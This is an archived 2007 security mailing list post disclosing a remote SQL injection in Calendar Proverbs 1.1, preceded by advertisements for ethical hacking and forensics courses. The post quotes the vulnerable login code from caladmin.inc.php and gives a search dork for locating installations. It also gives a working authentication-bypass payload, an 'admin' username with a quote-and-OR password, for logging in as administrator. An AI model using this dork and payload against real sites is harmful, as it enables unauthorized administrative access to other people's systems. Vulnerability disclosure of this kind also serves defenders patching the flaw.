Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection

Subject: Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection
Date: 26 Nov 2007 17:10:04 -0000
# Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection
# Download:
# http://www.proverbs.biz/downloads/calendar.zip
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Calendar powered by Proverbs"
# Stop lammer

[*] Vuln Code - caladmin.inc.php

$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "")
$user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
$pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);

[*] Simple Sql Injection In:

http://www.example.com/PATH/caladmin.php
http://www.example.com/events/caladmin.php

[*] Exploit:

Username: admin
Password: ' or

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández 

<Prev in Thread] Current Thread [Next in Thread>
  • Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection, sys-project <=